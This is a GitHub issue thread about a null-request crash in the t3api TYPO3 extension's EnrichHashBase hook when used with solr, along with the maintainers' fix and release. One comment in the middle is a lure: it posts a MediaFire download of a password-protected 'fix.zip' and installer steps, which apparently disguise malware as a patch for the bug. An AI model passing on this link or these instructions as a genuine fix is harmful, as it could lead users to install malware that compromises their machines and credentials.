### ISSUE TITLE
[BUG] Request object may be null in EnrichHashBase hook

### ISSUE THREAD

**Issue by fsuter** [sourcebroker/t3api#96]
### TYPO3 version

12.4.19

### PHP version

8.2.22

### Extension version

3.0.2

### Composer mode

- [x] I'm running TYPO3 in composer mode.

### Operating system

Linux 3.10.0 / MacOS 14.6.1

### Current behavior

I have an installation with both "solr" and "t3api". I have a number of tables exposed with the API provided by "t3api", which are also indexed with "solr". The indexing task of "solr" crashes because of the `\SourceBroker\T3api\Hook\EnrichHashBase` hook which is called when "solr" initializes a TSFE during indexing. The hook tries to get the TYPO3 request object using `\SourceBroker\T3api\Service\RouteService::getRequest()` which just returns `$GLOBALS['TYPO3_REQUEST']`. However this method does not expect the request object to be `null`, which it is in this particular context.

This is a change of behaviour induced by the following commit: https://github.com/sourcebroker/t3api/commit/c36be252a6273a1a1bff37a15cd999bd307dd864

### Expected behavior

`\SourceBroker\T3api\Service\RouteService::getRequest()` should allow for the request object to be `null`.

The simple solution is to change the method signature to allow null as a return value:
```
    protected static function getRequest(): ?ServerRequestInterface
    {
        return $GLOBALS['TYPO3_REQUEST'];
    }
```

but this has an impact on the rest of the above-mentioned commit.

### Steps to reproduce

1. install both solr and t3api
2. expose a table in the API and index it with solr
3. when running the Scheduler task from the command-line, the task crashes, with the following exception:
```
Uncaught TYPO3 Exception ApacheSolrForTypo3\Solr\Task\IndexQueueWorkerTask::getInitializedIndexService(): Argument #1 ($site) must be of type ApacheSolrForTypo3\Solr\Domain\Site\Site, null given, called in /var/www/html/vendor/apache-solr-for-typo3/solr/Classes/Task/IndexQueueWorkerTask.php on line 64
thrown in file /var/www/html/vendor/apache-solr-for-typo3/solr/Classes/Task/IndexQueueWorkerTask.php
in line 176
```

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct.

**Comment by projetosgppag** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by kszymukowicz** [comment]
@fsuter 

Tnx for this finding! 

The fix is in current main and will be released next week as 3.x bugfix.
I had no good env to reproduce your case so give me a note if this fix will not solve your problem.

**Comment by fsuter** [comment]
Hi. My suggested fix was enough to prevent a crash, but this now lets a warning float up about "Undefined global variable $TYPO3_REQUEST". I'll submit a PR for this one.

**Comment by kszymukowicz** [comment]
Tnx @fsuter!
Released.
